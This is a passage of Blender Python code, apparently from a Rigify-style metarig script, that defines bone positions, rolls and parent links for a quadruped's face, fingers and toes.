bone = arm.edit_bones.new('r_middle.02.R')
bone.head[:] = -0.0866, 0.3467, 0.0317
bone.tail[:] = -0.0851, 0.3297, 0.0224
bone.roll = -0.4076
bone.use_connect = True
bone.parent = arm.edit_bones[bones['r_middle.01.R']]
bones['r_middle.02.R'] = bone.name
bone = arm.edit_bones.new('r_index.02.R')
bone.head[:] = -0.0660, 0.3581, 0.0222
bone.tail[:] = -0.0623, 0.3410, 0.0170
bone.roll = -1.3847
bone.use_connect = True
bone.parent = arm.edit_bones[bones['r_index.01.R']]
bones['r_index.02.R'] = bone.name
bone = arm.edit_bones.new('nose')
bone.head[:] = 0.0000, -0.7082, 0.9031
bone.tail[:] = 0.0000, -0.7989, 0.8595
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['face']]
bones['nose'] = bone.name
bone = arm.edit_bones.new('lip.T.L')
bone.head[:] = 0.0000, -0.8212, 0.7930
bone.tail[:] = 0.0353, -0.7614, 0.7866
bone.roll = 0.0551
bone.use_connect = False
bone.parent = arm.edit_bones[bones['face']]
bones['lip.T.L'] = bone.name
bone = arm.edit_bones.new('lip.B.L')
bone.head[:] = 0.0000, -0.7962, 0.7788
bone.tail[:] = 0.0258, -0.7624, 0.7742
bone.roll = 0.0255
bone.use_connect = False
bone.parent = arm.edit_bones[bones['face']]
bones['lip.B.L'] = bone.name
bone = arm.edit_bones.new('jaw')
bone.head[:] = 0.0000, -0.6191, 0.7820
bone.tail[:] = 0.0000, -0.6960, 0.7733
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['face']]
bones['jaw'] = bone.name
bone = arm.edit_bones.new('ear.L')
bone.head[:] = 0.0949, -0.5457, 0.9545
bone.tail[:] = 0.0524, -0.5459, 0.9899
bone.roll = -1.1774
bone.use_connect = False
bone.parent = arm.edit_bones[bones['face']]
bones['ear.L'] = bone.name
bone = arm.edit_bones.new('ear.R')
bone.head[:] = -0.0949, -0.5457, 0.9545
bone.tail[:] = -0.0524, -0.5459, 0.9899
bone.roll = 1.1774
bone.use_connect = False
bone.parent = arm.edit_bones[bones['face']]
bones['ear.R'] = bone.name
bone = arm.edit_bones.new('lip.T.R')
bone.head[:] = 0.0000, -0.8212, 0.7930
bone.tail[:] = -0.0353, -0.7614, 0.7866
bone.roll = -0.0551
bone.use_connect = False
bone.parent = arm.edit_bones[bones['face']]
bones['lip.T.R'] = bone.name
bone = arm.edit_bones.new('lip.B.R')
bone.head[:] = 0.0000, -0.7962, 0.7788
bone.tail[:] = -0.0258, -0.7624, 0.7742
bone.roll = -0.0255
bone.use_connect = False
bone.parent = arm.edit_bones[bones['face']]
bones['lip.B.R'] = bone.name
bone = arm.edit_bones.new('brow.B.L')
bone.head[:] = 0.0745, -0.6532, 0.9192
bone.tail[:] = 0.0659, -0.6703, 0.9324
bone.roll = 0.7673
bone.use_connect = False
bone.parent = arm.edit_bones[bones['face']]
bones['brow.B.L'] = bone.name
bone = arm.edit_bones.new('lid.T.L')
bone.head[:] = 0.0621, -0.6644, 0.9197
bone.tail[:] = 0.0588, -0.6755, 0.9223
bone.roll = 0.0733
bone.use_connect = False
bone.parent = arm.edit_bones[bones['face']]
bones['lid.T.L'] = bone.name
bone = arm.edit_bones.new('brow.B.R')
bone.head[:] = -0.0745, -0.6532, 0.9192
bone.tail[:] = -0.0659, -0.6703, 0.9324
bone.roll = -0.7673
bone.use_connect = False
bone.parent = arm.edit_bones[bones['face']]
bones['brow.B.R'] = bone.name
bone = arm.edit_bones.new('lid.T.R')
bone.head[:] = -0.0621, -0.6644, 0.9197
bone.tail[:] = -0.0588, -0.6755, 0.9223
bone.roll = -0.0733
bone.use_connect = False
bone.parent = arm.edit_bones[bones['face']]
bones['lid.T.R'] = bone.name
bone = arm.edit_bones.new('forehead.L')
bone.head[:] = 0.0208, -0.6604, 0.9808
bone.tail[:] = 0.0160, -0.7017, 0.9527
bone.roll = 1.9432
bone.use_connect = False
bone.parent = arm.edit_bones[bones['face']]
bones['forehead.L'] = bone.name
bone = arm.edit_bones.new('forehead.R')
bone.head[:] = -0.0208, -0.6604, 0.9808
bone.tail[:] = -0.0160, -0.7017, 0.9527
bone.roll = -1.9432
bone.use_connect = False
bone.parent = arm.edit_bones[bones['face']]
bones['forehead.R'] = bone.name
bone = arm.edit_bones.new('eye.L')
bone.head[:] = 0.0388, -0.6496, 0.9149
bone.tail[:] = 0.0388, -0.7010, 0.9149
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['face']]
bones['eye.L'] = bone.name
bone = arm.edit_bones.new('eye.R')
bone.head[:] = -0.0388, -0.6496, 0.9149
bone.tail[:] = -0.0388, -0.7010, 0.9149
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['face']]
bones['eye.R'] = bone.name
bone = arm.edit_bones.new('cheek.T.L')
bone.head[:] = 0.0906, -0.6428, 0.9032
bone.tail[:] = 0.0660, -0.6881, 0.8704
bone.roll = -0.0634
bone.use_connect = False
bone.parent = arm.edit_bones[bones['face']]
bones['cheek.T.L'] = bone.name
bone = arm.edit_bones.new('cheek.T.R')
bone.head[:] = -0.0906, -0.6428, 0.9032
bone.tail[:] = -0.0660, -0.6881, 0.8704
bone.roll = 0.0634
bone.use_connect = False
bone.parent = arm.edit_bones[bones['face']]
bones['cheek.T.R'] = bone.name
bone = arm.edit_bones.new('teeth.T')
bone.head[:] = 0.0004, -0.7594, 0.8194
bone.tail[:] = 0.0004, -0.7302, 0.8292
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['face']]
bones['teeth.T'] = bone.name
bone = arm.edit_bones.new('teeth.B')
bone.head[:] = 0.0004, -0.7504, 0.7968
bone.tail[:] = 0.0004, -0.7204, 0.8041
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['face']]
bones['teeth.B'] = bone.name
bone = arm.edit_bones.new('tongue')
bone.head[:] = 0.0004, -0.7646, 0.7930
bone.tail[:] = 0.0004, -0.7476, 0.7967
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['face']]
bones['tongue'] = bone.name
bone = arm.edit_bones.new('front_toe.L')
bone.head[:] = 0.1088, -0.2462, 0.0411
bone.tail[:] = 0.1088, -0.3259, 0.0000
bone.roll = 3.1416
bone.use_connect = True
bone.parent = arm.edit_bones[bones['front_foot.L']]
bones['front_toe.L'] = bone.name
bone = arm.edit_bones.new('front_toe.R')
bone.head[:] = -0.1088, -0.2462, 0.0411
bone.tail[:] = -0.1088, -0.3259, 0.0000
bone.roll = -3.1416
bone.use_connect = True
bone.parent = arm.edit_bones[bones['front_foot.R']]
bones['front_toe.R'] = bone.name
bone = arm.edit_bones.new('r_pinky.03.L')
bone.head[:] = 0.1431, 0.3382, 0.0170
bone.tail[:] = 0.1455, 0.3175, 0.0129
bone.roll = -1.0952
bone.use_connect = True
bone.parent = arm.edit_bones[bones['r_pinky.02.L']]
bones['r_pinky.03.L'] = bone.name
bone = arm.edit_bones.new('r_ring.03.L')
bone.head[:] = 0.1188, 0.3297, 0.0224
bone.tail[:] = 0.1239, 0.2905, 0.0129
bone.roll = -0.9905
bone.use_connect = True
bone.parent = arm.edit_bones[bones['r_ring.02.L']]
bones['r_ring.03.L'] = bone.name
bone = arm.edit_bones.new('r_middle.03.L')
bone.head[:] = 0.0851, 0.3297, 0.0224
bone.tail[:] = 0.0813, 0.2904, 0.0129
bone.roll = 0.8084
bone.use_connect = True
bone.parent = arm.edit_bones[bones['r_middle.02.L']]
bones['r_middle.03.L'] = bone.name
bone = arm.edit_bones.new('r_index.03.L')
bone.head[:] = 0.0623, 0.3410, 0.0170
bone.tail[:] = 0.0552, 0.3214, 0.0129
bone.roll = 2.2048
bone.use_connect = True
bone.parent = arm.edit_bones[bones['r_index.02.L']]
bones['r_index.03.L'] = bone.name
bone = arm.edit_bones.new('r_pinky.03.R')
bone.head[:] = -0.1431, 0.3382, 0.0170
bone.tail[:] = -0.1455, 0.3175, 0.0129
bone.roll = 1.0952
bone.use_connect = True
bone.parent = arm.edit_bones[bones['r_pinky.02.R']]
bones['r_pinky.03.R'] = bone.name
bone = arm.edit_bones.new('r_ring.03.R')
bone.head[:] = -0.1188, 0.3297, 0.0224
bone.tail[:] = -0.1239, 0.2905, 0.0129
bone.roll = 0.9905
bone.use_connect = True
bone.parent = arm.edit_bones[bones['r_ring.02.R']]
bones['r_ring.03.R'] = bone.name
bone = arm.edit_bones.new('r_middle.03.R')
bone.head[:] = -0.0851, 0.3297, 0.0224
bone.tail[:] = -0.0813, 0.2904, 0.0129
bone.roll = -0.8084
bone.use_connect = True
bone.parent = arm.edit_bones[bones['r_middle.02.R']]
bones['r_middle.03.R'] = bone.name
bone = arm.edit_bones.new('r_index.03.R')
bone.head[:] = -0.0623, 0.3410, 0.0170
bone.tail[:] = -0.0552, 0.3214, 0.0129
bone.roll = -2.2048
bone.use_connect = True
bone.parent = arm.edit_bones[bones['r_index.02.R']]
bones['r_index.03.R'] = bone.name
bone = arm.edit_bones.new('nose.001')
bone.head[:] = 0.0000, -0.7989, 0.8595
bone.tail[:] = 0.0000, -0.8391, 0.8371
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['nose']]
bones['nose.001'] = bone.name
bone = arm.edit_bones.new('lip.T.L.001')
bone.head[:] = 0.0353, -0.7614, 0.7866
bone.tail[:] = 0.0482, -0.6927, 0.7995
bone.roll = 0.1558
bone.use_connect = True
bone.parent = arm.edit_bones[bones['lip.T.L']]
bones['lip.T.L.001'] = bone.name
bone = arm.edit_bones.new('lip.B.L.001')
bone.head[:] = 0.0258, -0.7624, 0.7742
bone.tail[:] = 0.0482, -0.6927, 0.7995
bone.roll = 0.4650
bone.use_connect = True
bone.parent = arm.edit_bones[bones['lip.B.L']]
bones['lip.B.L.001'] = bone.name
bone = arm.edit_bones.new('chin')
bone.head[:] = 0.0000, -0.6960, 0.7733
bone.tail[:] = 0.0000, -0.7687, 0.7625
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['jaw']]
bones['chin'] = bone.name
bone = arm.edit_bones.new('ear.L.001')
bone.head[:] = 0.0524, -0.5459, 0.9899
bone.tail[:] = 0.0727, -0.5682, 1.0212
bone.roll = 0.2280
bone.use_connect = True
bone.parent = arm.edit_bones[bones['ear.L']]
bones['ear.L.001'] = bone.name
bone = arm.edit_bones.new('ear.R.001')
bone.head[:] = -0.0524, -0.5459, 0.9899
bone.tail[:] = -0.0727, -0.5682, 1.0212
bone.roll = -0.2280
bone.use_connect = True
bone.parent = arm.edit_bones[bones['ear.R']]
bones['ear.R.001'] = bone.name
bone = arm.edit_bones.new('lip.T.R.001')
bone.head[:] = -0.0353, -0.7614, 0.7866
bone.tail[:] = -0.0482, -0.6927, 0.7995
bone.roll = -0.1558
bone.use_connect = True
bone.parent = arm.edit_bones[bones['lip.T.R']]
bones['lip.T.R.001'] = bone.name
bone = arm.edit_bones.new('lip.B.R.001')
bone.head[:] = -0.0258, -0.7624, 0.7742
bone.tail[:] = -0.0482, -0.6927, 0.7995
bone.roll = -0.4650
bone.use_connect = True
bone.parent = arm.edit_bones[bones['lip.B.R']]
bones['lip.B.R.001'] = bone.name
bone = arm.edit_bones.new('brow.B.L.001')
bone.head[:] = 0.0659, -0.6703, 0.9324
bone.tail[:] = 0.0507, -0.6764, 0.9344
bone.roll = 0.0953
bone.use_connect = True
bone.parent = arm.edit_bones[bones['brow.B.L']]
bones['brow.B.L.001'] = bone.name
bone = arm.edit_bones.new('lid.T.L.001')
bone.head[:] = 0.0588, -0.6755, 0.9223
bone.tail[:] = 0.0503, -0.6779, 0.9257
bone.roll = 0.4801
bone.use_connect = True
bone.parent = arm.edit_bones[bones['lid.T.L']]
bones['lid.T.L.001'] = bone.name
bone = arm.edit_bones.new('brow.B.R.001')
bone.head[:] = -0.0659, -0.6703, 0.9324
bone.tail[:] = -0.0507, -0.6764, 0.9344
bone.roll = -0.0953
bone.use_connect = True
bone.parent = arm.edit_bones[bones['brow.B.R']]
bones['brow.B.R.001'] = bone.name
bone = arm.edit_bones.new('lid.T.R.001')
bone.head[:] = -0.0588, -0.6755, 0.9223
bone.tail[:] = -0.0503, -0.6779, 0.9257
bone.roll = -0.4801
bone.use_connect = True
bone.parent = arm.edit_bones[bones['lid.T.R']]
bones['lid.T.R.001'] = bone.name
bone = arm.edit_bones.new('forehead.L.001')
bone.head[:] = 0.0418, -0.6520, 0.9749
bone.tail[:] = 0.0510, -0.6773, 0.9561
bone.roll = 0.5278
bone.use_connect = False
bone.parent = arm.edit_bones[bones['forehead.L']]
bones['forehead.L.001'] = bone.name
bone = arm.edit_bones.new('forehead.R.001')
bone.head[:] = -0.0418, -0.6520, 0.9749
bone.tail[:] = -0.0510, -0.6773, 0.9561
bone.roll = -0.5278
bone.use_connect = False
bone.parent = arm.edit_bones[bones['forehead.R']]
bones['forehead.R.001'] = bone.name
bone = arm.edit_bones.new('cheek.T.L.001')
bone.head[:] = 0.0660, -0.6881, 0.8704
bone.tail[:] = 0.0389, -0.7093, 0.8768
bone.roll = -0.5772
bone.use_connect = True
bone.parent = arm.edit_bones[bones['cheek.T.L']]
bones['cheek.T.L.001'] = bone.name
bone = arm.edit_bones.new('cheek.T.R.001')
bone.head[:] = -0.0660, -0.6881, 0.8704
bone.tail[:] = -0.0389, -0.7093, 0.8768
bone.roll = 0.5772
bone.use_connect = True
bone.parent = arm.edit_bones[bones['cheek.T.R']]
bones['cheek.T.R.001'] = bone.name
bone = arm.edit_bones.new('tongue.001')
bone.head[:] = 0.0004, -0.7476, 0.7967
bone.tail[:] = 0.0004, -0.7246, 0.8052
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['tongue']]
bones['tongue.001'] = bone.name
bone = arm.edit_bones.new('f_palm.04.L')
bone.head[:] = 0.1229, -0.2329, 0.0282
bone.tail[:] = 0.1426, -0.2749, 0.0253
bone.roll = -2.8623
bone.use_connect = False
bone.parent = arm.edit_bones[bones['front_toe.L']]
bones['f_palm.04.L'] = bone.name
bone = arm.edit_bones.new('f_palm.03.L')
bone.head[:] = 0.1142, -0.2346, 0.0282
bone.tail[:] = 0.1239, -0.2833, 0.0377
bone.roll = 1.5833
bone.use_connect = False
bone.parent = arm.edit_bones[bones['front_toe.L']]
bones['f_palm.03.L'] = bone.name
bone = arm.edit_bones.new('f_palm.02.L')
bone.head[:] = 0.1053, -0.2345, 0.0282
bone.tail[:] = 0.0983, -0.2834, 0.0377
bone.roll = -1.2317
bone.use_connect = False
bone.parent = arm.edit_bones[bones['front_toe.L']]
bones['f_palm.02.L'] = bone.name
bone = arm.edit_bones.new('f_palm.01.L')
bone.head[:] = 0.0934, -0.2319, 0.0282
bone.tail[:] = 0.0791, -0.2716, 0.0253
bone.roll = 2.8333
bone.use_connect = False
bone.parent = arm.edit_bones[bones['front_toe.L']]
bones['f_palm.01.L'] = bone.name
bone = arm.edit_bones.new('f_palm.04.R')
bone.head[:] = -0.1229, -0.2329, 0.0282
bone.tail[:] = -0.1426, -0.2749, 0.0253
bone.roll = 2.8623
bone.use_connect = False
bone.parent = arm.edit_bones[bones['front_toe.R']]
bones['f_palm.04.R'] = bone.name
bone = arm.edit_bones.new('f_palm.03.R')
bone.head[:] = -0.1142, -0.2346, 0.0282
bone.tail[:] = -0.1239, -0.2833, 0.0377
bone.roll = -1.5833
bone.use_connect = False
bone.parent = arm.edit_bones[bones['front_toe.R']]
bones['f_palm.03.R'] = bone.name
bone = arm.edit_bones.new('f_palm.02.R')
bone.head[:] = -0.1053, -0.2345, 0.0282
bone.tail[:] = -0.0983, -0.2834, 0.0377
bone.roll = 1.2317
bone.use_connect = False
bone.parent = arm.edit_bones[bones['front_toe.R']]
bones['f_palm.02.R'] = bone.name
bone = arm.edit_bones.new('f_palm.01.R')
bone.head[:] = -0.0934, -0.2319, 0.0282
bone.tail[:] = -0.0791, -0.2716, 0.0253
bone.roll = -2.8333
bone.use_connect = False
bone.parent = arm.edit_bones[bones['front_toe.R']]
bones['f_palm.01.R'] = bone.name
bone = arm.edit_bones.new('nose.002')
bone.head[:] = 0.0000, -0.8391, 0.8371
bone.tail[:] = 0.0000, -0.8452, 0.8281
bone.roll = -0.0162
bone.use_connect = True
bone.parent = arm.edit_bones[bones['nose.001']]
bones['nose.002'] = bone.name
bone = arm.edit_bones.new('chin.001')
bone.head[:] = 0.0000, -0.7687, 0.7625
bone.tail[:] = 0.0000, -0.7926, 0.7756
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['chin']]
bones['chin.001'] = bone.name
bone = arm.edit_bones.new('ear.L.002')
bone.head[:] = 0.0727, -0.5682, 1.0212
bone.tail[:] = 0.1158, -0.5606, 1.0358
bone.roll = -1.9007
bone.use_connect = True
bone.parent = arm.edit_bones[bones['ear.L.001']]
bones['ear.L.002'] = bone.name
bone = arm.edit_bones.new('ear.R.002')
bone.head[:] = -0.0727, -0.5682, 1.0212
bone.tail[:] = -0.1158, -0.5606, 1.0358
bone.roll = 1.9007
bone.use_connect = True
bone.parent = arm.edit_bones[bones['ear.R.001']]
bones['ear.R.002'] = bone.name
bone = arm.edit_bones.new('brow.B.L.002')
bone.head[:] = 0.0507, -0.6764, 0.9344
bone.tail[:] = 0.0362, -0.6871, 0.9343
bone.roll = 0.2604
bone.use_connect = True
bone.parent = arm.edit_bones[bones['brow.B.L.001']]
bones['brow.B.L.002'] = bone.name
bone = arm.edit_bones.new('lid.T.L.002')
bone.head[:] = 0.0503, -0.6779, 0.9257
bone.tail[:] = 0.0361, -0.6798, 0.9241
bone.roll = 0.0945
bone.use_connect = True
bone.parent = arm.edit_bones[bones['lid.T.L.001']]
bones['lid.T.L.002'] = bone.name
bone = arm.edit_bones.new('brow.B.R.002')
bone.head[:] = -0.0507, -0.6764, 0.9344
bone.tail[:] = -0.0362, -0.6871, 0.9343
bone.roll = -0.2604
bone.use_connect = True
bone.parent = arm.edit_bones[bones['brow.B.R.001']]
bones['brow.B.R.002'] = bone.name
bone = arm.edit_bones.new('lid.T.R.002')
bone.head[:] = -0.0503, -0.6779, 0.9257
bone.tail[:] = -0.0361, -0.6798, 0.9241
bone.roll = -0.0945
bone.use_connect = True
bone.parent = arm.edit_bones[bones['lid.T.R.001']]
bones['lid.T.R.002'] = bone.name
bone = arm.edit_bones.new('forehead.L.002')
bone.head[:] = 0.0581, -0.6362, 0.9723
bone.tail[:] = 0.0774, -0.6567, 0.9438
bone.roll = -0.3374
bone.use_connect = False
bone.parent = arm.edit_bones[bones['forehead.L.001']]
bones['forehead.L.002'] = bone.name
bone = arm.edit_bones.new('forehead.R.002')
bone.head[:] = -0.0581, -0.6362, 0.9723
bone.tail[:] = -0.0774, -0.6567, 0.9438
bone.roll = 0.3374
bone.use_connect = False
bone.parent = arm.edit_bones[bones['forehead.R.001']]
bones['forehead.R.002'] = bone.name
bone = arm.edit_bones.new('nose.L')
bone.head[:] = 0.0389, -0.7093, 0.8768
bone.tail[:] = 0.0360, -0.7993, 0.8371
bone.roll = -2.8274
bone.use_connect = True
bone.parent = arm.edit_bones[bones['cheek.T.L.001']]
bones['nose.L'] = bone.name
bone = arm.edit_bones.new('nose.R')
bone.head[:] = -0.0389, -0.7093, 0.8768
bone.tail[:] = -0.0360, -0.7993, 0.8371
bone.roll = 2.8274
bone.use_connect = True
bone.parent = arm.edit_bones[bones['cheek.T.R.001']]
bones['nose.R'] = bone.name
bone = arm.edit_bones.new('tongue.002')
bone.head[:] = 0.0004, -0.7246, 0.8052
bone.tail[:] = 0.0004, -0.6900, 0.8003
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['tongue.001']]
bones['tongue.002'] = bone.name
bone = arm.edit_bones.new('f_pinky.01.L')
bone.head[:] = 0.1426, -0.2749, 0.0253
bone.tail[:] = 0.1477, -0.2946, 0.0222
bone.roll = -2.0928
bone.use_connect = False
bone.parent = arm.edit_bones[bones['f_palm.04.L']]
bones['f_pinky.01.L'] = bone.name
bone = arm.edit_bones.new('f_ring.01.L')
bone.head[:] = 0.1239, -0.2833, 0.0377
bone.tail[:] = 0.1255, -0.3031, 0.0317
bone.roll = -0.5451
bone.use_connect = False
bone.parent = arm.edit_bones[bones['f_palm.03.L']]
bones['f_ring.01.L'] = bone.name
bone = arm.edit_bones.new('f_middle.01.L')
bone.head[:] = 0.0983, -0.2834, 0.0377
bone.tail[:] = 0.0955, -0.3030, 0.0317
bone.roll = 0.9401
bone.use_connect = False
bone.parent = arm.edit_bones[bones['f_palm.02.L']]
bones['f_middle.01.L'] = bone.name
bone = arm.edit_bones.new('f_index.01.L')
bone.head[:] = 0.0791, -0.2716, 0.0253
bone.tail[:] = 0.0749, -0.2916, 0.0222
bone.roll = 1.9945
bone.use_connect = False
bone.parent = arm.edit_bones[bones['f_palm.01.L']]
bones['f_index.01.L'] = bone.name
bone = arm.edit_bones.new('f_pinky.01.R')
bone.head[:] = -0.1426, -0.2749, 0.0253
bone.tail[:] = -0.1477, -0.2946, 0.0222
bone.roll = 2.0928
bone.use_connect = False
bone.parent = arm.edit_bones[bones['f_palm.04.R']]
bones['f_pinky.01.R'] = bone.name
bone = arm.edit_bones.new('f_ring.01.R')
bone.head[:] = -0.1239, -0.2833, 0.0377
bone.tail[:] = -0.1255, -0.3031, 0.0317
bone.roll = 0.5451
bone.use_connect = False
bone.parent = arm.edit_bones[bones['f_palm.03.R']]
bones['f_ring.01.R'] = bone.name
bone = arm.edit_bones.new('f_middle.01.R')
bone.head[:] = -0.0983, -0.2834, 0.0377
bone.tail[:] = -0.0955, -0.3030, 0.0317
bone.roll = -0.9401
bone.use_connect = False
bone.parent = arm.edit_bones[bones['f_palm.02.R']]
bones['f_middle.01.R'] = bone.name
bone = arm.edit_bones.new('f_index.01.R')
bone.head[:] = -0.0791, -0.2716, 0.0253
bone.tail[:] = -0.0749, -0.2916, 0.0222
bone.roll = -1.9945
bone.use_connect = False
bone.parent = arm.edit_bones[bones['f_palm.01.R']]
bones['f_index.01.R'] = bone.name
bone = arm.edit_bones.new('nose.003')
bone.head[:] = 0.0000, -0.8452, 0.8281
bone.tail[:] = 0.0000, -0.8349, 0.8089
bone.roll = -0.0248
bone.use_connect = True
bone.parent = arm.edit_bones[bones['nose.002']]
bones['nose.003'] = bone.name
bone = arm.edit_bones.new('ear.L.003')
bone.head[:] = 0.1158, -0.5606, 1.0358
bone.tail[:] = 0.1130, -0.5379, 0.9935
bone.roll = 2.4141
bone.use_connect = True
bone.parent = arm.edit_bones[bones['ear.L.002']]
bones['ear.L.003'] = bone.name
bone = arm.edit_bones.new('ear.R.003')
bone.head[:] = -0.1158, -0.5606, 1.0358
bone.tail[:] = -0.1130, -0.5379, 0.9935
bone.roll = -2.4141
bone.use_connect = True
bone.parent = arm.edit_bones[bones['ear.R.002']]
bones['ear.R.003'] = bone.name
bone = arm.edit_bones.new('brow.B.L.003')
bone.head[:] = 0.0362, -0.6871, 0.9343
bone.tail[:] = 0.0269, -0.6936, 0.9293
bone.roll = 0.2912
bone.use_connect = True
bone.parent = arm.edit_bones[bones['brow.B.L.002']]
bones['brow.B.L.003'] = bone.name
bone = arm.edit_bones.new('lid.T.L.003')
bone.head[:] = 0.0361, -0.6798, 0.9241
bone.tail[:] = 0.0281, -0.6756, 0.9088
bone.roll = -0.3539
bone.use_connect = True
bone.parent = arm.edit_bones[bones['lid.T.L.002']]
bones['lid.T.L.003'] = bone.name
bone = arm.edit_bones.new('brow.B.R.003')
bone.head[:] = -0.0362, -0.6871, 0.9343
bone.tail[:] = -0.0269, -0.6936, 0.9293
bone.roll = -0.2912
bone.use_connect = True
bone.parent = arm.edit_bones[bones['brow.B.R.002']]
bones['brow.B.R.003'] = bone.name
bone = arm.edit_bones.new('lid.T.R.003')
bone.head[:] = -0.0361, -0.6798, 0.9241
bone.tail[:] = -0.0281, -0.6756, 0.9088
bone.roll = 0.3539
bone.use_connect = True
bone.parent = arm.edit_bones[bones['lid.T.R.002']]
bones['lid.T.R.003'] = bone.name
bone = arm.edit_bones.new('temple.L')
bone.head[:] = 0.0590, -0.5870, 0.9758
bone.tail[:] = 0.0931, -0.5866, 0.8642
bone.roll = -0.4594
bone.use_connect = False
bone.parent = arm.edit_bones[bones['forehead.L.002']]
bones['temple.L'] = bone.name
bone = arm.edit_bones.new('temple.R')
bone.head[:] = -0.0590, -0.5870, 0.9758
bone.tail[:] = -0.0931, -0.5866, 0.8642
bone.roll = 0.4594
bone.use_connect = False
bone.parent = arm.edit_bones[bones['forehead.R.002']]
bones['temple.R'] = bone.name
bone = arm.edit_bones.new('nose.L.001')
bone.head[:] = 0.0360, -0.7993, 0.8371
bone.tail[:] = 0.0000, -0.8391, 0.8371
bone.roll = 2.9287
bone.use_connect = True
bone.parent = arm.edit_bones[bones['nose.L']]
bones['nose.L.001'] = bone.name
bone = arm.edit_bones.new('nose.R.001')
bone.head[:] = -0.0360, -0.7993, 0.8371
bone.tail[:] = 0.0000, -0.8391, 0.8371
bone.roll = -2.9287
bone.use_connect = True
bone.parent = arm.edit_bones[bones['nose.R']]
bones['nose.R.001'] = bone.name
bone = arm.edit_bones.new('f_pinky.02.L')
bone.head[:] = 0.1477, -0.2946, 0.0222
bone.tail[:] = 0.1520, -0.3116, 0.0170
bone.roll = -1.4292
bone.use_connect = True
bone.parent = arm.edit_bones[bones['f_pinky.01.L']]
bones['f_pinky.02.L'] = bone.name
bone = arm.edit_bones.new('f_ring.02.L')
bone.head[:] = 0.1255, -0.3031, 0.0317
bone.tail[:] = 0.1278, -0.3200, 0.0224
bone.roll = -0.5100
bone.use_connect = True
bone.parent = arm.edit_bones[bones['f_ring.01.L']]
bones['f_ring.02.L'] = bone.name
bone = arm.edit_bones.new('f_middle.02.L')
bone.head[:] = 0.0955, -0.3030, 0.0317
bone.tail[:] = 0.0940, -0.3200, 0.0224
bone.roll = 0.4076
bone.use_connect = True
bone.parent = arm.edit_bones[bones['f_middle.01.L']]
bones['f_middle.02.L'] = bone.name
bone = arm.edit_bones.new('f_index.02.L')
bone.head[:] = 0.0749, -0.2916, 0.0222
bone.tail[:] = 0.0712, -0.3087, 0.0170
bone.roll = 1.3847
bone.use_connect = True
bone.parent = arm.edit_bones[bones['f_index.01.L']]
bones['f_index.02.L'] = bone.name
bone = arm.edit_bones.new('f_pinky.02.R')
bone.head[:] = -0.1477, -0.2946, 0.0222
bone.tail[:] = -0.1520, -0.3116, 0.0170
bone.roll = 1.4292
bone.use_connect = True
bone.parent = arm.edit_bones[bones['f_pinky.01.R']]
bones['f_pinky.02.R'] = bone.name
bone = arm.edit_bones.new('f_ring.02.R')
bone.head[:] = -0.1255, -0.3031, 0.0317
bone.tail[:] = -0.1278, -0.3200, 0.0224
bone.roll = 0.5100
bone.use_connect = True
bone.parent = arm.edit_bones[bones['f_ring.01.R']]
bones['f_ring.02.R'] = bone.name
bone = arm.edit_bones.new('f_middle.02.R')
bone.head[:] = -0.0955, -0.3030, 0.0317
bone.tail[:] = -0.0940, -0.3200, 0.0224
bone.roll = -0.4076
bone.use_connect = True
bone.parent = arm.edit_bones[bones['f_middle.01.R']]
bones['f_middle.02.R'] = bone.name
bone = arm.edit_bones.new('f_index.02.R')
bone.head[:] = -0.0749, -0.2916, 0.0222
bone.tail[:] = -0.0712, -0.3087, 0.0170
bone.roll = -1.3847
bone.use_connect = True
bone.parent = arm.edit_bones[bones['f_index.01.R']]
bones['f_index.02.R'] = bone.name
bone = arm.edit_bones.new('nose.004')
bone.head[:] = 0.0000, -0.8349, 0.8089
bone.tail[:] = 0.0000, -0.8159, 0.7913
bone.roll = 0.0082
bone.use_connect = True
bone.parent = arm.edit_bones[bones['nose.003']]
bones['nose.004'] = bone.name
bone = arm.edit_bones.new('ear.L.004')
bone.head[:] = 0.1130, -0.5379, 0.9935
bone.tail[:] = 0.0949, -0.5457, 0.9545
bone.roll = -2.3814
bone.use_connect = True
bone.parent = arm.edit_bones[bones['ear.L.003']]
bones['ear.L.004'] = bone.name
bone = arm.edit_bones.new('ear.R.004')
bone.head[:] = -0.1130, -0.5379, 0.9935
bone.tail[:] = -0.0949, -0.5457, 0.9545
bone.roll = 2.3814
bone.use_connect = True
bone.parent = arm.edit_bones[bones['ear.R.003']]
bones['ear.R.004'] = bone.name
bone = arm.edit_bones.new('lid.B.L')
bone.head[:] = 0.0281, -0.6756, 0.9088
bone.tail[:] = 0.0382, -0.6786, 0.9040
bone.roll = 0.2941
bone.use_connect = True
bone.parent = arm.edit_bones[bones['lid.T.L.003']]
bones['lid.B.L'] = bone.name
bone = arm.edit_bones.new('lid.B.R')
bone.head[:] = -0.0281, -0.6756, 0.9088
bone.tail[:] = -0.0382, -0.6786, 0.9040
bone.roll = -0.2941
bone.use_connect = True
bone.parent = arm.edit_bones[bones['lid.T.R.003']]
bones['lid.B.R'] = bone.name
bone = arm.edit_bones.new('jaw.L')
bone.head[:] = 0.0931, -0.5866, 0.8642
bone.tail[:] = 0.0694, -0.6211, 0.8005
bone.roll = 0.0983
bone.use_connect = True
bone.parent = arm.edit_bones[bones['temple.L']]
bones['jaw.L'] = bone.name
bone = arm.edit_bones.new('jaw.R')
bone.head[:] = -0.0931, -0.5866, 0.8642
bone.tail[:] = -0.0694, -0.6211, 0.8005
bone.roll = -0.0983
bone.use_connect = True
bone.parent = arm.edit_bones[bones['temple.R']]
bones['jaw.R'] = bone.name
bone = arm.edit_bones.new('f_pinky.03.L')
bone.head[:] = 0.1520, -0.3116, 0.0170
bone.tail[:] = 0.1544, -0.3323, 0.0129
bone.roll = -1.0952
bone.use_connect = True
